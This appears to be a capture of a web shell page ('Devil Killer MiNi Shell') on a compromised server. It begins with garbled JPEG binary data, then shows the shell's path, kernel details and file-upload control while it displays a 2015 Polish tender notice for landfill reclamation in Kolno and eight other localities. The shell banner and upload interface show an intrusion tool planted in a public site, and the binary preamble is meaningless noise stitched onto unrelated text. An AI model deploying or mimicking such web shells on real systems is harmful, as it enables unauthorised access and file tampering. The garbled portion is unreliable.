JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150603/133364-N-2015.html

<p class="kh_header"><b>Kolno: Rekultywacja gminnych składowisk odpadów komunalnych województwa podlaskiego</b><br>
<b>Numer ogłoszenia: 133364 - 2015; data zamieszczenia: 03.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kolno , ul. Wojska Polskiego 20, 18-500 Kolno, woj. podlaskie, tel. 086 2782133, faks 086 2783100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> kolno.home.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rekultywacja gminnych składowisk odpadów komunalnych województwa podlaskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres:
Zakres przedmiotowy projektu obejmuje rekultywację 9 gminnych składowisk odpadów komunalnych o łącznej powierzchni rekultywowanej 6,11 ha na cele przyrodnicze. Wszelkie działania maja na celu przywrócenie wartości użytkowych gruntów poprzez właściwe ukształtowanie terenu, odtworzenie gleby, uregulowanie właściwych stosunków wodnych, wprowadzenie lub uzyskanie w wyniku naturalnej sukcesji trwałej pokrywy roślinnej, introdukcję gatunków roślin, rewitalizację gleby oraz działania związane z odgazowaniem składowiska. Na wszystkich 9 rekultywowanych składowiskach zostaną utworzone ścieżki edukacyjne w obrębie terenu zrekultywowanego składowiska.

Zadanie 1. Gmina Filipów - miejscowość Filipów Trzeci
Roboty rekultywacyjne dla składowiska w m. Filipów Trzeci gm. Filipów 
1.		Roboty rozbiórkowe na terenie składowiska odpadów
2.		Roboty geodezyjne na terenie składowiska odpadów
3.		Formowanie skarp i wierzchowiny składowiska
4.		Ułożenie warstwy wyrównawczej 15 cm
5.		Wykonanie studni nowoprojektowanych SG-3-10
6.		Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 40 cm
7.		Wykonanie warstwy rekultywacyjnej okrywowej na terenie zrekultywowanego składowiska (ukształtowanie 35 cm warstwy glebotwórczej)
8.		Montaż reperu kontrolnego
9.		Wykonanie ścieżki edukacyjnej
10.		Wykonanie i montaż tablic edukacyjnych 4 szt. Wzór: 1, 2, 3, 4.
11.		Zadarnienie, zadrzewienie i zakrzewienie
12.		Dokumenty powykonawcze

Zadanie 2. Gmina Grabowo - miejscowość Golanki
Roboty rekultywacyjne dla składowiska w m. Golanki gm. Grabowo 
1.	Roboty rozbiórkowe na terenie składowiska odpadów
2. 	Roboty geodezyjne na terenie składowiska odpadów
3.	Roboty drogowe przy wykonaniu drogi z płyt żelbetowych
4.	Roboty przed wykonaniem warstwy rekultywacyjnej
5.	Wykonanie studni odgazowujących oraz obwałowania składowiska
6.	Wykonanie warstwy rekultywacyjnej
7.	Montaż repera kontrolnego
8.	Wykonanie rowów odwadniających
9.	Wykonanie ścieżki edukacyjnej
10.	Wykonanie i montaż tablic edukacyjnych 3 szt. Wzór: 1, 2, 3.
11.	Zadarnienie, zadrzewienie i zakrzewienie
12.	Dokumenty powykonawcze

Zadanie 3. Gmina Hajnówka - miejscowość Stare Berezowo
Roboty rekultywacyjne dla składowiska w m. Stare Berezowo gm. Hajnówka 
1.		Roboty rozbiórkowe na terenie składowiska odpadów
2.	 	Roboty geodezyjne na terenie składowiska odpadów
3.	 	Formowanie skarp i wierzchowiny składowiska
4.		Podniesienie istniejących studni odciekowych poprzez zainstalowanie dodatkowych kręgów betonowych
5.		Wykonanie studni nowoprojektowanych
6.		Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 30 cm
7.		Wykonanie warstwy rekultywacyjnej 	okrywowej na terenie zrekultywowanego składowiska
8.		Montaż reperu kontrolnego
9.		Wykonanie ścieżki edukacyjnej
10.		Wykonanie i montaż tablic edukacyjnych 3 szt. Wzór: 1,4,5.
11.		Zadarnienie, zadrzewienie i zakrzewienie
12.		Wykonanie ogrodzenia z siatki
13.		Dokumenty powykonawcze

Zadanie 4. Miasto Kolno - miejscowość Kolno
Roboty rekultywacyjne dla składowiska w m. Kolno miasto Kolno 
1.	Roboty przygotowawcze na terenie składowiska odpadów
2.	Formowanie skarp i wierzchowiny składowiska
3.	Wykonanie studni odgazowujących
4.	Ułożenie warstwy wyrównawczej
5.	Ułożenie warstwy odgazowujacej ze żwiru
6.	Uszczelnienie warstwy rekultywacji np. bentomatą
7.	Ułożenie warstwy odwadniajacej ze żwiru
8.	Wykonanie warstwy rekultywacyjnej okrywowej (ukształtowanie 35 cm warstwy glebotwórczej + 5 cm hummusu)
9.	Montaż repera kontrolnego
10.	Wykonanie ścieżki edukacyjnej
11.	Wykonanie i montaż tablic edukacyjnych 5 szt. Wzór: 1, 2, 3, 4, 5.
12	Zadarnienie, zadrzewienie i zakrzewienie
13.	Dokumenty powykonawcze

Zadanie 5. Gmina Krypno - miejscowość Zastocze
Roboty rekultywacyjne dla składowiska w m. Zastocze gm. Krypno 
1.	Prace przygotowawcze na terenie składowiska odpadów
2.	Roboty geodezyjne na terenie składowiska odpadów
3.	Formowanie skarp i wierzchowiny składowiska
4.	Ułożenie warstwy wyrównawczej 25 cm
5.	Wykonanie studni nowoprojektowanych sg-3-10
6.	Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 30 cm
7.	Wykonanie warstwy rekultywacyjnej okrywowej
8.	Montaż repera kontrolnego
9.	Wykonanie ścieżki edukacyjnej
10.	Wykonanie i montaż tablic edukacyjnych 4 szt. Wzór: 1, 2, 3, 4.
11.	Zadarnienie, zadrzewienie i zakrzewienie
12.	Naprawa bram
13.	Dokumenty powykonawcze

Zadanie 6. Gmina Kulesze Kościelne - miejscowość Czarnowo Biki
Roboty rekultywacyjne dla składowiska w m. Czarnowo Biki gm. Kulesze Kościelne 
1.	Roboty rozbiórkowe  na terenie składowiska odpadów
2.	Roboty geodezyjne na terenie składowiska odpadów
3.	Wykonanie studni odgazowujących
4.	Formowanie skarp i wierzchowiny składowiska wraz z dowiezionymi przez Inwestora odpadami
5.	Wykonanie warstwy rekultywacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 25 cm
6.	Wykonanie warstwy rekultywacyjnej (ukształtowanie 35 cm warstwy glebotwórczej zmieszanej z osadami ściekowymi o czaszy ukształtowanej opływowo na zewnątrz terenu rekultywowanego)
7.	Montaż głowicy repera
8.	Zadarnienie, zadrzewienie i zakrzewienie
9.	Wykonanie rowów odwadniajacych wokół składowiska
10.	Wykonanie ścieżki edukacyjnej
11.	Wykonanie i montaż tablic edukacyjnych 3 szt. Wzór: 1, 2, 3.
12.	Rozbiórka ogrodzenia z bramą
13.	Dokumenty powykonawcze

Zadanie 7. Gmina Nowogród - miejscowość Nowogród
Roboty rekultywacyjne dla składowiska w m. Nowogród gm. Nowogród 
1.	Roboty przygotowawcze i rozbiórkowe na terenie składowiska odpadów
2.	Roboty geodezyjne na terenie składowiska odpadów
3.	Formowanie skarp i wierzchowiny składowiska
4.	Ułożenie warstwy wyrównawczej
5.	Wykonanie studni nowoprojektowanych odgazowujących
6.	Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 30 cm
7.		Wykonanie warstwy rekultywacyjnej okrywowej i humusowej
8.	Montaż reperów kontrolnych
9.	Wykonanie i montaż tablic edukacyjnych 5 szt. Wzór: 1, 2, 3, 4, 5.
11.	Wykonanie ścieżki edukacyjnej
12.	Zadarnienie, zadrzewienie i zakrzewienie
13.	Wykonanie ogrodzenia z siatki
14.	Dokumenty powykonawcze

Zadanie 8. Gmina Radziłów - miejscowość Radziłów
Roboty rekultywacyjne dla składowiska w m. Radziłów gm. Radziłów 
1.	Roboty rozbiórkowe na terenie składowiska odpadów
2.	Roboty geodezyjne na terenie składowiska odpadów
3.	Wykonanie studni odgazowujących
4.	Połączenie istniejącej studni na odcieki ze studnią kontrolną
5.	Formowanie skarp i wierzchowiny składowiska wraz z dowiezionymi przez Inwestora odpadami
6.	Wykonanie warstwy rekultywacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 25 cm
7.	Wykonanie warstwy rekultywacyjnej (ukształtowanie 35 cm warstwy glebotwórczej zmieszanej z osadami ściekowymi o czaszy ukształtowanej opływowo na zewnątrz terenu rekultywowanego)
8.	Montaż głowicy repera
9.	Wykonanie ścieżki edukacyjnej
10.	Wykonanie i montaż tablic edukacyjnych 4 szt. Wzór: 1, 2, 3, 5.
11.	Zadarnienie, zadrzewienie i zakrzewienie
12.	Wykonanie rowów odwadniających wokół wydzielonej części składowiska odpadów
13.	Rozbiórka ogrodzenia z bramą
14.	Dokumenty powykonawcze
15.	Istniejące na składowisku budynki pozostają bez zmian

Zadanie 9. Gmina Zbójna - miejscowość Pianki
Roboty rekultywacyjne dla składowiska w m. Pianki gm. Zbójna 
1.		Roboty rozbiórkowe na terenie składowiska odpadów
2.		Formowanie skarp i wierzchowiny składowiska
3.		Roboty geodezyjne na terenie składowiska odpadów
4.		Ułożenie warstwy wyrównawczej
5.		Wykonanie studni nowoprojektowanych
6.		Wykonanie warstwy izolacyjnej z gruntu mineralnego zwięzłego z mieszaniną ziemi i iłu o miąższości 30 cm
7.		Wykonanie warstwy rekultywacyjnej okrywowej
8.		Montaż repera
9.		Wykonanie ścieżki edukacyjnej
10.		Wykonanie i montaż tablic edukacyjnych 3 szt. Wzór: 1, 3, 5.
11.		Zadarnienie, zadrzewienie i zakrzewienie
12.		Dokumenty powykonawcze

W przypadku różnicy wysokości rzędnych z dokumentacji projektowej a stanem faktycznym spowodowanym obsiadaniem czaszy wysypiska Zamawiający dopuszcza możliwość korekty rzędnych na podstawie protokołów konieczności przy zachowaniu wszystkich warunków wynikających z dokumentacji projektowej w uzasadnionych przypadkach za zgodą Zamawiającego i Inspektora Nadzoru.

Przedmiary dołączone do specyfikacji istotnych warunków zamówienia stanowią wyłącznie element pomocniczy, ułatwiający sporządzenie oferty. Roboty budowlane ujęte w dokumentacji projektowej, a nie ujęte w przedmiarach nie będą traktowane jako roboty dodatkowe i nie będą finansowane przez zamawiającego. Jeżeli występują rozbieżności pomiędzy dokumentacją projektową a przedmiarami robót, należy przyjąć za wiążącą dokumentację projektową.

W drewnianej tablicy edukacyjnej należy uwzględnić część graficzną (edukacyjną) z przeznaczeniem do ekspozycji na zewnątrz. Nośnikiem głównym - blacha ocynkowana grubości min. 0,8 mm. Wydruk wodoodporny o rozdzielczości min. 1440 dpi. odporny na działanie czynników atmosferycznych UV H2O. Całość laminowana warstwą ochronna anty-UV i antygrafitti. Zawartość tablic:
1.	Wzór 1. Tablica z ogólnymi informacjami na temat projektu ( krótki tekst wprowadzający, ogólne założenia projektu,  opis wysypiska, herb miejscowości, logo projektu, mapka itp.),
2.	Wzór 2. Tablica edukacyjna o niszczącym wpływie dzikich wysypisk na środowisko naturalne,
3.	Wzór 3. Tablica edukacyjna pokazująca czas rozkładu różnych odpadów,
4.	Wzór 4. Tablica edukacyjna o segregacji odpadów,
5.	Wzór 5. Tablica edukacyjna o recyklingu,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.20-4, 45.11.23.30-7, 45.11.00.00-1, 45.11.12.00-0, 45.11.27.00-2, 45.20.00.00-9, 45.22.21.10-3, 77.31.00.00-6, 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium: ustala się wadium w wysokości:
a) Zadanie 1. Gmina Filipow - miejscowość Filipow Trzeci - 11 000 zł, (słownie złotych: jedenaście tysięcy),
b) Zadanie 2. Gmina Grabowo - miejscowość Golanki - 10 000 zł, (słownie złotych: dziesięć tysięcy),
c) Zadanie 3. Gmina Hajnówka - miejscowość Stare Berezowo - 6 000 zł, (słownie złotych: sześć tysięcy),
d) Zadanie 4. Miasto Kolno - miejscowość Kolno - 33 000 zł, (słownie złotych: trzydzieści trzy tysiące),
e) Zadanie 5. Gmina Krypno - miejscowość Zastocze - 12 000 zł, (słownie złotych: dwanaście tysięcy),
f) Zadanie 6. Gmina Kulesze Kościelne - miejscowość Czarnowo Biki - 7 000 zł, (słownie złotych: siedem tysięcy),
g) Zadanie 7. Gmina Nowogród - miejscowość Nowogród - 48 000 zł, (słownie złotych: czterdzieści osiem tysięcy),
h) Zadanie 8. Gmina Radziłów - miejscowość Radziłów - 22 000 zł, (słownie złotych: dwadzieścia dwa tysiące),
i) Zadanie 9. Gmina Zbójna - miejscowość Pianki - 7 000 zł, (słownie złotych: siedem tysięcy).
2. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie: 
1) w pieniądzu, przelewem na rachunek bankowy: Bank Spółdzielczy w Kolnie Nr 85 8754 0004 0000 8341 2000 0060 z adnotacją wadium - Rekultywacja gminnych składowisk odpadów komunalnych województwa podlaskiego Zadanie Nr Gmina  
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
3) w gwarancjach bankowych,  
4) w gwarancjach ubezpieczeniowych  
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275). 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: Bank Spółdzielczy w Kolnie Nr 85 8754 0004 0000 8341 2000 0060. 
4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
5. Wadium wniesione w pieniądzu należy złożyć z odpowiednim wyprzedzeniem, tak aby wpłynęło ono na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego. 
6. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
7. Wadium określone w dziale VIII pkt. 1 lit a-i należy wystawić na każde zadanie oddzielnie.
8. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie. 
9. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta poręczyciela. 
10. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
11. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
12. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
14. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się aby Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jedno zadanie polegające na rekultywacji wysypiska lub wykonaniu robót ziemnych polegających na przemieszczaniu mas ziemnych takich jak wymiany gruntów, niwelacja terenu, wykonywanie nasypów, skarpowanie o wartości minimum brutto robót dla poszczególnych zadań:
a) Zadanie 1. Gmina Filipow - miejscowość Filipow Trzeci - 500 000 zł,
b) Zadanie 2. Gmina Grabowo - miejscowość Golanki - 270 000 zł,
c) Zadanie 3. Gmina Hajnówka - miejscowość Stare Berezowo - 170 000 zł,
d) Zadanie 4. Miasto Kolno - miejscowość Kolno - 900 000 zł,
e) Zadanie 5. Gmina Krypno - miejscowość Zastocze - 350 000 zł,
f) Zadanie 6. Gmina Kulesze Kościelne - miejscowość Czarnowo Biki - 220 000 zł,
g) Zadanie 7. Gmina Nowogród - miejscowość Nowogród - 1 200 000 zł,
h) Zadanie 8. Gmina Radziłów - miejscowość Radziłów - 600 000 zł,
i) Zadanie 9. Gmina Zbójna - miejscowość Pianki - 200 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Zamawiający uzna powyższych warunek za spełniony, jeżeli Wykonawca dysponuje osobami, które posiadają następujące uprawnienia: 
a) jedna osoba z uprawnieniami budowlanymi do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub drogowej; 
b) jedna osoba z uprawnieniami budowlanymi do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych; 
Zamawiający nie wymaga dysponowania odrębną osobą dla każdej specjalności w przypadku, gdy jedna osoba posiada uprawnienia w dwóch lub więcej specjalnościach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać środki finansowe w wysokości minimum:
a) Zadanie 1. Gmina Filipow - miejscowość Filipow Trzeci - 500 000 zł,
b) Zadanie 2. Gmina Grabowo - miejscowość Golanki - 270 000 zł,
c) Zadanie 3. Gmina Hajnówka - miejscowość Stare Berezowo - 170 000 zł,
d) Zadanie 4. Miasto Kolno - miejscowość Kolno - 900 000 zł,
e) Zadanie 5. Gmina Krypno - miejscowość Zastocze - 350 000 zł,
f) Zadanie 6. Gmina Kulesze Kościelne - miejscowość Czarnowo Biki - 220 000 zł,
g) Zadanie 7. Gmina Nowogród - miejscowość Nowogród - 1 200 000 zł,
h) Zadanie 8. Gmina Radziłów - miejscowość Radziłów - 600 000 zł,
i) Zadanie 9. Gmina Zbójna - miejscowość Pianki - 200 000 zł,
lub zdolność kredytową na w/w kwotę. 
W przypadku chęci realizacji przez Wykonawcę więcej niż jednego zadania środki finansowe z pkt 4 lit od a) do i) sumuje się według poszczególnych zadań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>co najmniej jedno zadanie polegające na rekultywacji wysypiska lub wykonaniu robót ziemnych polegających na przemieszczaniu mas ziemnych takich jak wymiany gruntów, niwelacja terenu, wykonywanie nasypów, skarpowanie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
